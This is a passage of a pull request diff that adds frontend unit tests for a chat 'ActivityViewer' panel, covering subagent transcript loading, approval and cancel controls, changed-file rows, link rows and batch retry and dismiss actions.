### PR TITLE
test(website): frontend coverage wave -- 20 new suites over untested SPA surfaces

### DIFF
--- a/website/src/test/ActivityViewerCoverage.test.tsx
+++ b/website/src/test/ActivityViewerCoverage.test.tsx
@@ -1,0 +1,920 @@
+/**
+ * ActivityViewer — coverage for the interactive paths the existing
+ * ActivityViewer.test.tsx / ActivityViewer.issues.test.tsx files render but
+ * never drive: the subagent card's lazy disk loader, its approval and
+ * cancel/collapse controls, the spawn-approval entry, the changed-file row's
+ * keyboard and hover controls, and the panel-level batch actions
+ * (retry-failed / dismiss-done / show-all) plus the workflows tab.
+ *
+ * Conventions follow ActivityViewer.test.tsx (locally-built Provider +
+ * QueryClientProvider wrapper, an `api` module mock, a stubbed MarkdownPanel)
+ * and ArtifactsPageCoverage.test.tsx (small fixture makers, `within` for
+ * anything that appears more than once).
+ */
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { render, screen, fireEvent, waitFor, within, act } from '@testing-library/react'
+import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
+import { Provider } from 'react-redux'
+import { MemoryRouter, useLocation } from 'react-router-dom'
+import type { ReactNode } from 'react'
+
+// The approval entry's tiered trust control is a Radix dropdown, which never
+// opens under the test DOM; the repo's shared mock renders the menu inline.
+vi.mock('@radix-ui/react-dropdown-menu', async () => await import('./__mocks__/@radix-ui/react-dropdown-menu'))
+
+vi.mock('../api/client', () => ({
+  api: {
+    spawnStatus: vi.fn().mockResolvedValue({ result: '' }),
+    spawnDelete: vi.fn().mockResolvedValue({}),
+    spawnRetry: vi.fn().mockResolvedValue({}),
+    resolveApproval: vi.fn().mockResolvedValue({}),
+    approveChatSlot: vi.fn().mockResolvedValue({}),
+    fileDiff: vi.fn().mockResolvedValue({ diff: '' }),
+    artifacts: vi.fn().mockResolvedValue({ artifacts: [] }),
+    createArtifact: vi.fn().mockResolvedValue({ slug: 'new-slug', version: 1 }),
+    setArtifactPinned: vi.fn().mockResolvedValue({}),
+  },
+}))
+
+// MarkdownPanel drags in Monaco; stub it with the same imperative handle the
+// real panel exposes so the inline preview's guarded close still works.
+vi.mock('../components/MarkdownPanel', async () => {
+  const { forwardRef, useImperativeHandle } = await import('react')
+  return {
+    default: forwardRef<{ requestClose: () => void }, { filePath: string; content: string; onClose: () => void }>(
+      ({ filePath, content, onClose }, ref) => {
+        useImperativeHandle(ref, () => ({ requestClose: onClose }), [onClose])
+        return <div data-testid="md-panel">{filePath}::{content}</div>
+      },
+    ),
+  }
+})
+
+import ActivityViewer, { countDiffStats } from '../pages/chat/ActivityViewer'
+import { api } from '../api/client'
+import { createTestStore } from './helpers'
+import { openActivityToTab, selectSubagent } from '../store/chatSlice'
+import { setInlineDraft, __resetPanelTabs } from '../hooks/usePanelTabs'
+import type { SubagentActivity, ToolActivity, Artifact } from '../types'
+import type { TouchedFile } from '../hooks/useTouchedFiles'
+import type { ExtractedLink } from '../utils/extractChatLinks'
+
+const SLOT = 'test-slot'
+
+type Store = ReturnType<typeof createTestStore>
+
+/** Wrapper mirroring ActivityViewer.test.tsx: real store, isolated query cache. */
+function renderPanel(ui: React.ReactElement, store: Store = createTestStore()) {
+  const qc = new QueryClient({ defaultOptions: { queries: { retry: false } } })
+  function Wrapper({ children }: { children: ReactNode }) {
+    return (
+      <Provider store={store}>
+        <QueryClientProvider client={qc}>
+          <MemoryRouter>{children}</MemoryRouter>
+        </QueryClientProvider>
+      </Provider>
+    )
+  }
+  return { store, ...render(ui, { wrapper: Wrapper }) }
+}
+
+const baseProps = {
+  subagents: {} as Record<string, SubagentActivity>,
+  toolLog: [] as ToolActivity[],
+  open: true,
+  onToggle: vi.fn(),
+  slot: SLOT,
+}
+
+const mkAgent = (id: string, over: Partial<SubagentActivity> = {}): SubagentActivity => ({
+  id,
+  task: `task for ${id}`,
+  agent: `ag-${id}`,
+  status: 'done',
+  streaming: '',
+  lastTool: '',
+  startedAt: 1_700_000_000_000,
+  elapsed: 4,
+  ...over,
+})
+
+const mkFile = (path: string, over: Partial<TouchedFile> = {}): TouchedFile => ({
+  path, ts: 1_700_000_000_000, source: 'tool', ...over,
+})
+
+const mkArtifact = (slug: string, over: Partial<Artifact> = {}): Artifact => ({
+  slug,
+  name: slug.replace(/-/g, ' '),
+  kind: 'markdown',
+  source: 'chat',
+  description: '',
+  tags: [],
+  version: 1,
+  created_at: '2026-08-01T00:00:00+00:00',
+  updated_at: '2026-08-01T00:00:00+00:00',
+  ...over,
+})
+
+const mkLink = (url: string, label: string, type: ExtractedLink['type'] = 'other'): ExtractedLink =>
+  ({ url, label, type, msgIdx: 0 })
+
+/** Store whose chat slice already tracks `agent` for SLOT, so the reducers the
+ *  card dispatches into (markSubagentApproving / sseSubagentDone) have a record
+ *  to mutate. Defaults are spread first: RTK REPLACES a slice with
+ *  preloadedState rather than merging, so a partial would drop every other key
+ *  and the reducers would then throw. */
+function storeTracking(agent: SubagentActivity) {
+  const d = createTestStore().getState()
+  return createTestStore({
+    chat: { ...d.chat, activeSlot: SLOT, subagents: { [agent.id]: agent } },
+  })
+}
+
+/** A fetch stub that answers the two endpoints this component reaches for. */
+function stubFetch(opts: { runs?: unknown[]; fileText?: string; fileOk?: boolean } = {}) {
+  const { runs = [], fileText = 'file body', fileOk = true } = opts
+  const impl = vi.fn().mockImplementation((input: RequestInfo | URL) => {
+    const url = String(input)
+    if (url.includes('/api/workflows/runs')) {
+      return Promise.resolve({ ok: true, status: 200, json: async () => ({ runs }) })
+    }
+    return Promise.resolve({
+      ok: fileOk,
+      status: fileOk ? 200 : 500,
+      text: async () => fileText,
+      headers: { get: () => null },
+      json: async () => ({}),
+    })
+  })
+  global.fetch = impl as unknown as typeof fetch
+  return impl
+}
+
+/** The done-card header carries the only aria-expanded in a subagent card. */
+function cardHeader(container: HTMLElement) {
+  const el = container.querySelector('[aria-expanded]')
+  if (!el) throw new Error('no collapsible card header rendered')
+  return el as HTMLElement
+}
+
+let prevFetch: typeof fetch
+
+beforeEach(() => {
+  prevFetch = global.fetch
+  localStorage.clear()
+  __resetPanelTabs()
+  vi.clearAllMocks()
+  vi.mocked(api.spawnStatus).mockResolvedValue({ result: 'the transcript' })
+  vi.mocked(api.spawnDelete).mockResolvedValue({})
+  vi.mocked(api.spawnRetry).mockResolvedValue({})
+  vi.mocked(api.resolveApproval).mockResolvedValue({})
+  vi.mocked(api.fileDiff).mockResolvedValue({ diff: '' })
+  vi.mocked(api.artifacts).mockResolvedValue({ artifacts: [] })
+  stubFetch()
+})
+
+afterEach(() => { global.fetch = prevFetch })
+
+/* ── Subagent card: lazy transcript loading ─────────────────────────────────*/
+
+describe('ActivityViewer — subagent transcript loading', () => {
+  const doneAgent = () => ({ s1: mkAgent('s1', { status: 'done' }) })
+
+  it('loads a finished agent transcript from disk only when asked', async () => {
+    const { container } = renderPanel(
+      <ActivityViewer {...baseProps} view="subagents" subagents={doneAgent()} />,
+    )
+    // A finished card mounts collapsed, so nothing is fetched up front.
+    expect(api.spawnStatus).not.toHaveBeenCalled()
+
+    fireEvent.click(cardHeader(container))
+    fireEvent.click(screen.getByRole('button', { name: 'Load output from disk' }))
+
+    expect(await screen.findByText('the transcript')).toBeInTheDocument()
+    expect(api.spawnStatus).toHaveBeenCalledWith('s1', expect.objectContaining({ signal: expect.anything() }))
+  })
+
+  it('says so rather than showing a blank body when the transcript is empty', async () => {
+    vi.mocked(api.spawnStatus).mockResolvedValue({ result: '' })
+    const { container } = renderPanel(
+      <ActivityViewer {...baseProps} view="subagents" subagents={doneAgent()} />,
+    )
+    fireEvent.click(cardHeader(container))
+    fireEvent.click(screen.getByRole('button', { name: 'Load output from disk' }))
+
+    expect(await screen.findByText('(no output)')).toBeInTheDocument()
+  })
+
+  it('leaves a failed transcript read retryable', async () => {
+    vi.mocked(api.spawnStatus).mockRejectedValueOnce(new Error('gone'))
+    const { container } = renderPanel(
+      <ActivityViewer {...baseProps} view="subagents" subagents={doneAgent()} />,
+    )
+    fireEvent.click(cardHeader(container))
+    fireEvent.click(screen.getByRole('button', { name: 'Load output from disk' }))
+
+    const retry = await screen.findByRole('button', { name: 'Failed — click to retry' })
+    vi.mocked(api.spawnStatus).mockResolvedValue({ result: 'second time lucky' })
+    fireEvent.click(retry)
+
+    expect(await screen.findByText('second time lucky')).toBeInTheDocument()
+  })
+
+  it('expands and auto-loads the agent selected from a chip, then clears the selection', async () => {
+    const store = createTestStore()
+    store.dispatch(selectSubagent('s1'))
+    renderPanel(
+      <ActivityViewer {...baseProps} view="subagents" subagents={doneAgent()} />,
+      store,
+    )
+    // Selection expands the card AND pulls the output without a button press.
+    expect(await screen.findByText('the transcript')).toBeInTheDocument()
+    // …then releases the selection so a later re-click re-triggers it.
+    await waitFor(() => expect(store.getState().chat.selectedSubagentId).toBeNull(), { timeout: 2000 })
+  })
+
+  it('keeps a native card inline instead of offering a disk read it cannot serve', () => {
+    const { container } = renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{ 'native:1': mkAgent('native:1', { status: 'done' }) }}
+      />,
+    )
+    fireEvent.click(cardHeader(container))
+    expect(screen.getByText('(output shown in chat)')).toBeInTheDocument()
+    expect(screen.queryByRole('button', { name: 'Load output from disk' })).not.toBeInTheDocument()
+  })
+
+  it('waits for output on a running agent instead of reading from disk', () => {
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{ s1: mkAgent('s1', { status: 'running', lastTool: 'fs_read' }) }}
+      />,
+    )
+    expect(screen.getByText('Waiting for output…')).toBeInTheDocument()
+    expect(screen.getByText('fs_read')).toBeInTheDocument()
+    expect(api.spawnStatus).not.toHaveBeenCalled()
+  })
+})
+
+/* ── Subagent card: controls ────────────────────────────────────────────────*/
+
+describe('ActivityViewer — subagent card controls', () => {
+  it('approves a pending agent through the card', async () => {
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{ p1: mkAgent('p1', { status: 'pending', approval_id: 'ap-1' }) }}
+      />,
+    )
+    expect(screen.getByText('Pending Approval')).toBeInTheDocument()
+    // Exact name: the card itself is a Clickable (role=button) whose accessible
+    // name contains every label inside it, including this one.
+    fireEvent.click(screen.getByRole('button', { name: 'Approve' }))
+
+    await waitFor(() => expect(api.resolveApproval).toHaveBeenCalledWith('ap-1', 'approve'))
+  })
+
+  it('terminates the card locally when a pending agent is rejected', async () => {
+    const pending = mkAgent('p1', { status: 'pending', approval_id: 'ap-1' })
+    const { store } = renderPanel(
+      <ActivityViewer {...baseProps} view="subagents" subagents={{ p1: pending }} />,
+      storeTracking(pending),
+    )
+    fireEvent.click(screen.getByRole('button', { name: 'Reject' }))
+
+    await waitFor(() => expect(api.resolveApproval).toHaveBeenCalledWith('ap-1', 'reject'))
+    // A rejected spawn emits nothing further, so the card is finished locally.
+    await waitFor(() => {
+      expect(store.getState().chat.subagents.p1?.status).toBe('error')
+    })
+  })
+
+  it('releases the approving flag when the approval call fails', async () => {
+    vi.mocked(api.resolveApproval).mockRejectedValue(new Error('nope'))
+    const pending = mkAgent('p1', { status: 'pending', approval_id: 'ap-1' })
+    const { store } = renderPanel(
+      <ActivityViewer {...baseProps} view="subagents" subagents={{ p1: pending }} />,
+      storeTracking(pending),
+    )
+    fireEvent.click(screen.getByRole('button', { name: 'Approve' }))
+
+    await waitFor(() => expect(store.getState().chat.subagents.p1?.approving).toBe(false))
+  })
+
+  it('does nothing for a pending agent with no approval id', () => {
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{ p1: mkAgent('p1', { status: 'pending' }) }}
+      />,
+    )
+    fireEvent.click(screen.getByRole('button', { name: 'Approve' }))
+    expect(api.resolveApproval).not.toHaveBeenCalled()
+  })
+
+  it('collapses a finished card from the keyboard, ignoring other keys', () => {
+    const { container } = renderPanel(
+      <ActivityViewer {...baseProps} view="subagents" subagents={{ s1: mkAgent('s1') }} />,
+    )
+    const header = cardHeader(container)
+    expect(header).toHaveAttribute('aria-expanded', 'false')
+
+    fireEvent.keyDown(header, { key: 'Enter' })
+    expect(header).toHaveAttribute('aria-expanded', 'true')
+
+    fireEvent.keyDown(header, { key: ' ' })
+    expect(header).toHaveAttribute('aria-expanded', 'false')
+
+    fireEvent.keyDown(header, { key: 'a' })
+    expect(header).toHaveAttribute('aria-expanded', 'false')
+  })
+
+  it('auto-collapses a card that finishes while it is open', async () => {
+    const { container, rerender } = renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{ s1: mkAgent('s1', { status: 'running', streaming: 'working' }) }}
+      />,
+    )
+    // Running cards have no collapse control at all.
+    expect(container.querySelector('[aria-expanded]')).toBeNull()
+
+    rerender(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{ s1: mkAgent('s1', { status: 'done', streaming: 'working' }) }}
+      />,
+    )
+    expect(cardHeader(container)).toHaveAttribute('aria-expanded', 'true')
+    await waitFor(
+      () => expect(cardHeader(container)).toHaveAttribute('aria-expanded', 'false'),
+      { timeout: 4000 },
+    )
+  })
+
+  it('cancels a running agent without selecting the card', () => {
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{ s1: mkAgent('s1', { status: 'running', streaming: 'x' }) }}
+      />,
+    )
+    fireEvent.click(screen.getByTestId('subagent-cancel-btn'))
+    expect(api.spawnDelete).toHaveBeenCalledWith('s1')
+  })
+
+  it('stops following the output once the user scrolls up, and resumes at the bottom', () => {
+    const props = (streaming: string) => (
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{ s1: mkAgent('s1', { status: 'running', streaming }) }}
+      />
+    )
+    const { rerender } = renderPanel(props('line one'))
+    const body = screen.getByText('Output').parentElement?.querySelector('pre') as HTMLElement
+    // jsdom reports zero metrics, so give the body a real scrollable geometry.
+    Object.defineProperty(body, 'clientHeight', { configurable: true, value: 100 })
+    Object.defineProperty(body, 'scrollHeight', { configurable: true, value: 500 })
+
+    body.scrollTop = 0
+    fireEvent.scroll(body)
+    rerender(props('line one\nline two'))
+    expect(body.scrollTop).toBe(0)
+
+    body.scrollTop = 490
+    fireEvent.scroll(body)
+    rerender(props('line one\nline two\nline three'))
+    expect(body.scrollTop).toBe(500)
+  })
+
+  it('selects the card when its body is clicked', () => {
+    const { container } = renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{ s1: mkAgent('s1', { status: 'running', streaming: 'x' }) }}
+      />,
+    )
+    const card = container.querySelector('[role="button"].bg-card') as HTMLElement
+    expect(card).toBeTruthy()
+    fireEvent.click(card)
+    // No observable side effect beyond the card surviving the click; the
+    // panel's own selection index is internal.
+    expect(screen.getByText('Running')).toBeInTheDocument()
+  })
+
+  it('labels a cancelled error differently from a plain failure', () => {
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{
+          e1: mkAgent('e1', { status: 'error', error: 'Cancelled by user' }),
+          e2: mkAgent('e2', { status: 'stopped' }),
+        }}
+      />,
+    )
+    expect(screen.getByText('Cancelled')).toBeInTheDocument()
+    expect(screen.getByText('Stopped')).toBeInTheDocument()
+  })
+
+  it('shows the failure and the last tool on an expanded error card', () => {
+    const { container } = renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{ e1: mkAgent('e1', { status: 'error', error: 'boom', lastTool: 'bash', result: 'trace' }) }}
+      />,
+    )
+    fireEvent.click(cardHeader(container))
+    expect(screen.getByText('boom')).toBeInTheDocument()
+    expect(screen.getByText(/Last tool:\s*bash/)).toBeInTheDocument()
+  })
+})
+
+/* ── Spawn approval entries ─────────────────────────────────────────────────*/
+
+describe('ActivityViewer — spawn approval entries', () => {
+  const pending: ToolActivity = {
+    type: 'approval',
+    text: 'Running: git push origin feature',
+    ts: 1_700_000_000_000,
+    approval_id: 'ap-9',
+    approval_type: 'spawn',
+  }
+
+  it('renders a pending spawn approval with its time and resolves it', async () => {
+    renderPanel(<ActivityViewer {...baseProps} view="subagents" toolLog={[pending]} />)
+
+    expect(screen.getByText('Approval Needed')).toBeInTheDocument()
+    expect(screen.getByText('Running: git push origin feature')).toBeInTheDocument()
+    expect(screen.getByText(/\d\d:\d\d:\d\d/)).toBeInTheDocument()
+
+    fireEvent.click(screen.getByRole('button', { name: /Approve/ }))
+
+    await waitFor(() => expect(api.resolveApproval).toHaveBeenCalledWith('ap-9', 'approve'))
+    expect(await screen.findByText('Approved')).toBeInTheDocument()
+  })
+
+  it('records a rejection as the decision on the entry', async () => {
+    renderPanel(<ActivityViewer {...baseProps} view="subagents" toolLog={[pending]} />)
+    fireEvent.click(screen.getByRole('button', { name: /Reject/ }))
+
+    await waitFor(() => expect(api.resolveApproval).toHaveBeenCalledWith('ap-9', 'reject'))
+    expect(await screen.findByText('Rejected')).toBeInTheDocument()
+  })
+
+  it('restores the buttons when resolving the approval fails', async () => {
+    vi.mocked(api.resolveApproval).mockRejectedValue(new Error('offline'))
+    renderPanel(<ActivityViewer {...baseProps} view="subagents" toolLog={[pending]} />)
+    fireEvent.click(screen.getByRole('button', { name: /Approve/ }))
+
+    await waitFor(() => expect(screen.getByText('Approval Needed')).toBeInTheDocument())
+    expect(screen.getByRole('button', { name: /Reject/ })).toBeInTheDocument()
+  })
+
+  it('grants trust for the command through the dropdown', async () => {
+    renderPanel(<ActivityViewer {...baseProps} view="subagents" toolLog={[pending]} />)
+    fireEvent.click(screen.getByText('Trust'))
+
+    const [trustThisCommand] = screen.getAllByRole('menuitem')
+    expect(trustThisCommand).toHaveTextContent('git push origin feature')
+    fireEvent.click(trustThisCommand)
+
+    await waitFor(() => expect(api.resolveApproval).toHaveBeenCalledWith('ap-9', 'approve'))
+    expect(await screen.findByText('Trusted command')).toBeInTheDocument()
+  })
+
+  it('shows an already-resolved approval with no actions left', () => {
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        toolLog={[{ ...pending, type: 'approval_resolved' }]}
+      />,
+    )
+    expect(screen.getByText('Resolved')).toBeInTheDocument()
+    expect(screen.queryByRole('button', { name: /Approve/ })).not.toBeInTheDocument()
+  })
+
+  it('ignores chat approvals and reasoning entries in the subagents tab', () => {
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        toolLog={[
+          { type: 'reasoning', text: 'thinking out loud', ts: 1 },
+          { type: 'approval', text: 'chat question', ts: 2, approval_type: 'chat', approval_id: 'c1' },
+        ]}
+      />,
+    )
+    expect(screen.queryByText('Approval Needed')).not.toBeInTheDocument()
+    expect(screen.getByText('No subagents running')).toBeInTheDocument()
+  })
+})
+
+/* ── Changed-file rows ──────────────────────────────────────────────────────*/
+
+describe('ActivityViewer — changed-file rows', () => {
+  it('counts added and removed lines, ignoring diff headers', () => {
+    expect(countDiffStats('--- a\n+++ b\n@@ -1 +1 @@\n+one\n+two\n-old')).toEqual({ added: 2, removed: 1 })
+    expect(countDiffStats('')).toEqual({ added: 0, removed: 0 })
+    expect(countDiffStats(' context only')).toEqual({ added: 0, removed: 0 })
+  })
+
+  it('renders the diffstat for a changed file', async () => {
+    vi.mocked(api.fileDiff).mockResolvedValue({ diff: '--- a\n+++ b\n+one\n+two\n-old' })
+    renderPanel(
+      <ActivityViewer {...baseProps} view="files" files={[mkFile('/proj/src/app.ts')]} onFileOpen={vi.fn()} />,
+    )
+    expect(await screen.findByText('+2')).toBeInTheDocument()
+    expect(screen.getByText('-1')).toBeInTheDocument()
+    expect(screen.getByText('/proj/src')).toBeInTheDocument()
+  })
+
+  it('opens a file row from the keyboard, ignoring other keys', () => {
+    const onFileOpen = vi.fn()
+    renderPanel(
+      <ActivityViewer {...baseProps} view="files" files={[mkFile('/proj/a.ts')]} onFileOpen={onFileOpen} />,
+    )
+    const row = screen.getByTitle('/proj/a.ts')
+    fireEvent.keyDown(row, { key: 'Enter' })
+    fireEvent.keyDown(row, { key: ' ' })
+    fireEvent.keyDown(row, { key: 'x' })
+    expect(onFileOpen).toHaveBeenCalledTimes(2)
+    expect(onFileOpen).toHaveBeenCalledWith('/proj/a.ts')
+  })
+
+  it('removes a row without opening the file underneath it', () => {
+    const onFileOpen = vi.fn()
+    const onFileRemove = vi.fn()
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="files"
+        files={[mkFile('/proj/a.ts')]}
+        onFileOpen={onFileOpen}
+        onFileRemove={onFileRemove}
+      />,
+    )
+    const remove = screen.getByRole('button', { name: 'Remove file from list' })
+    fireEvent.keyDown(remove, { key: 'Enter' })
+    fireEvent.click(remove)
+
+    expect(onFileRemove).toHaveBeenCalledWith('/proj/a.ts')
+    expect(onFileOpen).not.toHaveBeenCalled()
+  })
+
+  it('keeps the add-to-artifacts control from opening the file underneath it', () => {
+    const onFileOpen = vi.fn()
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="files"
+        files={[mkFile('/proj/notes.md')]}
+        onFileOpen={onFileOpen}
+      />,
+    )
+    const add = screen.getByTestId('file-artifact-/proj/notes.md')
+    fireEvent.keyDown(add, { key: 'Enter' })
+    expect(onFileOpen).not.toHaveBeenCalled()
+  })
+
+  it('links a promoted file to its artifact page when no panel host is wired', async () => {
+    vi.mocked(api.artifacts).mockResolvedValue({
+      artifacts: [mkArtifact('proj-notes', { source_path: '/proj/notes.md' })],
+    })
+    const onFileOpen = vi.fn()
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="files"
+        files={[mkFile('/proj/notes.md')]}
+        onFileOpen={onFileOpen}
+      />,
+    )
+    const link = await waitFor(() => {
+      const el = screen.getByTestId('file-artifact-/proj/notes.md')
+      expect(el.tagName).toBe('A')
+      return el
+    })
+    expect(link).toHaveAttribute('href', '/artifacts/proj-notes')
+
+    fireEvent.keyDown(link, { key: 'Enter' })
+    fireEvent.click(link)
+    expect(onFileOpen).not.toHaveBeenCalled()
+  })
+})
+
+/* ── Resource rows ──────────────────────────────────────────────────────────*/
+
+describe('ActivityViewer — resource rows', () => {
+  it('falls back to the raw string when a link is not a parseable URL', () => {
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="files"
+        navLinks={[mkLink('not a url at all', 'Broken reference')]}
+      />,
+    )
+    const row = screen.getByTitle('not a url at all')
+    expect(within(row).getByText('Broken reference')).toBeInTheDocument()
+    expect(within(row).getByText('not a url at all')).toBeInTheDocument()
+    expect(within(row).getByText('Link')).toBeInTheDocument()
+  })
+
+  it('encodes the link type as a screen-reader label per row', () => {
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="files"
+        navLinks={[
+          mkLink('https://github.com/o/r/pull/1', 'PR one', 'cr'),
+          mkLink('https://github.com/o/r/issues/2', 'Issue two', 'issue'),
+        ]}
+      />,
+    )
+    expect(within(screen.getByTitle('https://github.com/o/r/pull/1')).getByText('PR')).toBeInTheDocument()
+    expect(within(screen.getByTitle('https://github.com/o/r/issues/2')).getByText('Issue')).toBeInTheDocument()
+    // The host is the dimmed subtitle on both rows.
+    expect(screen.getAllByText('github.com')).toHaveLength(2)
+  })
+
+  it('clears an active file search from the inline control', () => {
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="files"
+        files={['a', 'b', 'c', 'd', 'e', 'f'].map(n => mkFile(`/proj/${n}.ts`))}
+        onFileOpen={vi.fn()}
+      />,
+    )
+    const box = screen.getByLabelText('Search by file name, folder, or link…') as HTMLInputElement
+    fireEvent.change(box, { target: { value: 'c.ts' } })
+    expect(screen.queryByTitle('/proj/a.ts')).not.toBeInTheDocument()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Clear' }))
+    expect(box.value).toBe('')
+    expect(screen.getByTitle('/proj/a.ts')).toBeInTheDocument()
+  })
+})
+
+/* ── Inline file preview ────────────────────────────────────────────────────*/
+
+describe('ActivityViewer — inline file preview', () => {
+  it('retries a failed read from the error state', async () => {
+    const fetchMock = stubFetch({ fileOk: false, fileText: 'nope' })
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="files"
+        files={[mkFile('/proj/a.md')]}
+        onFileOpen={vi.fn()}
+        onFileSave={vi.fn().mockResolvedValue(undefined)}
+      />,
+    )
+    fireEvent.click(screen.getByTitle('/proj/a.md'))
+    const retry = await screen.findByRole('button', { name: 'Retry' })
+
+    fetchMock.mockResolvedValue({
+      ok: true, status: 200, text: async () => 'recovered', headers: { get: () => null },
+      json: async () => ({}),
+    } as unknown as Response)
+    fireEvent.click(retry)
+
+    expect(await screen.findByTestId('md-panel')).toHaveTextContent('/proj/a.md::recovered')
+  })
+
+  it('confirms before discarding an unsaved draft with no editor mounted', async () => {
+    stubFetch({ fileOk: false, fileText: 'nope' })
+    setInlineDraft(SLOT, '/proj/a.md', 'unsaved work')
+    const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(false)
+    try {
+      renderPanel(
+        <ActivityViewer
+          {...baseProps}
+          view="files"
+          files={[mkFile('/proj/a.md')]}
+          onFileOpen={vi.fn()}
+          onFileSave={vi.fn().mockResolvedValue(undefined)}
+        />,
+      )
+      fireEvent.click(screen.getByTitle('/proj/a.md'))
+      await screen.findByRole('button', { name: 'Retry' })
+
+      // Declined: the preview stays put and the draft survives.
+      fireEvent.click(screen.getByRole('button', { name: 'Back to files' }))
+      expect(confirmSpy).toHaveBeenCalledWith('Discard unsaved changes?')
+      expect(screen.getByRole('button', { name: 'Retry' })).toBeInTheDocument()
+
+      // Confirmed: back to the list.
+      confirmSpy.mockReturnValue(true)
+      fireEvent.click(screen.getByRole('button', { name: 'Back to files' }))
+      await waitFor(() => expect(screen.queryByRole('button', { name: 'Retry' })).not.toBeInTheDocument())
+      expect(screen.getByTitle('/proj/a.md')).toBeInTheDocument()
+    } finally {
+      confirmSpy.mockRestore()
+    }
+  })
+})
+
+/* ── Panel-level behaviour ──────────────────────────────────────────────────*/
+
+describe('ActivityViewer — panel behaviour', () => {
+  it('renders nothing at all while collapsed', () => {
+    renderPanel(<ActivityViewer {...baseProps} open={false} view="subagents" />)
+    expect(screen.queryByRole('region', { name: 'Activity' })).not.toBeInTheDocument()
+    expect(global.fetch).not.toHaveBeenCalled()
+  })
+
+  it('leaves keys other than Escape to the focused control', () => {
+    const onToggle = vi.fn()
+    renderPanel(<ActivityViewer {...baseProps} view="subagents" onToggle={onToggle} />)
+    const region = screen.getByRole('region', { name: 'Activity' })
+    fireEvent.keyDown(region, { key: 'ArrowDown' })
+    expect(onToggle).not.toHaveBeenCalled()
+    fireEvent.keyDown(region, { key: 'Escape' })
+    expect(onToggle).toHaveBeenCalledTimes(1)
+  })
+
+  it('sorts agents needing attention above the finished pile', () => {
+    const { container } = renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{
+          done: mkAgent('done', { status: 'done', agent: 'six-done' }),
+          stopped: mkAgent('stopped', { status: 'stopped', agent: 'five-stopped' }),
+          running: mkAgent('running', { status: 'running', agent: 'four-running' }),
+          pending: mkAgent('pending', { status: 'pending', agent: 'three-pending' }),
+          stalled: mkAgent('stalled', { status: 'running', stalled: true, agent: 'two-stalled' }),
+          retrying: mkAgent('retrying', { status: 'running', retrying: true, agent: 'one-retrying' }),
+          failed: mkAgent('failed', { status: 'error', agent: 'zero-error' }),
+        }}
+      />,
+    )
+    const order = [...container.querySelectorAll('code')].map(c => c.textContent)
+    expect(order).toEqual([
+      'zero-error', 'one-retrying', 'two-stalled', 'three-pending',
+      'four-running', 'five-stopped', 'six-done',
+    ])
+  })
+
+  it('retries every failed agent from one control', async () => {
+    renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{
+          e1: mkAgent('e1', { status: 'error' }),
+          e2: mkAgent('e2', { status: 'error' }),
+          // Native cards have no manager record, so they are not retryable.
+          'native:x': mkAgent('native:x', { status: 'error' }),
+        }}
+      />,
+    )
+    const btn = screen.getByTestId('retry-failed-btn')
+    expect(btn).toHaveTextContent('Retry failed (2)')
+    fireEvent.click(btn)
+
+    await waitFor(() => expect(api.spawnRetry).toHaveBeenCalledTimes(2))
+    await waitFor(() => expect(screen.getByTestId('retry-failed-btn')).not.toBeDisabled())
+  })
+
+  it('dismisses only this slot terminal cards', async () => {
+    const { store } = renderPanel(
+      <ActivityViewer
+        {...baseProps}
+        view="subagents"
+        subagents={{
+          d1: mkAgent('d1', { status: 'done' }),
+          s1: mkAgent('s1', { status: 'stopped' }),
+          r1: mkAgent('r1', { status: 'running', streaming: 'x' }),
+        }}
+      />,
+    )
+    const btn = screen.getByTestId('dismiss-done-btn')
+    expect(btn).toHaveTextContent('Dismiss done (2)')
+    fireEvent.click(btn)
+
+    await waitFor(() => expect(api.spawnDelete).toHaveBeenCalledTimes(2))
+    expect(api.spawnDelete).toHaveBeenCalledWith('d1')
+    expect(api.spawnDelete).toHaveBeenCalledWith('s1')
+    expect(store.getState().chat.selectedSubagentId).toBeNull()
+  })
+
+  it('caps the rendered pile and reveals the rest on request', () => {
+    const many: Record<string, SubagentActivity> = {}
+    for (let i = 0; i < 31; i++) {
+      const id = `a${String(i).padStart(2, '0')}`
+      many[id] = mkAgent(id, { status: 'done', result: 'inline', agent: `chip-${id}` })
+    }
+    renderPanel(<ActivityViewer {...baseProps} view="subagents" subagents={many} />)
+
+    expect(screen.queryByText('chip-a30')).not.toBeInTheDocument()
+    fireEvent.click(screen.getByTestId('show-all-subagents'))
+
+    expect(screen.getByText('chip-a30')).toBeInTheDocument()
+    expect(screen.queryByTestId('show-all-subagents')).not.toBeInTheDocument()
+  })
+
+  it('lifts the cap by itself for an agent selected from past it', async () => {
+    const many: Record<string, SubagentActivity> = {}
+    for (let i = 0; i < 31; i++) {
+      const id = `a${String(i).padStart(2, '0')}`
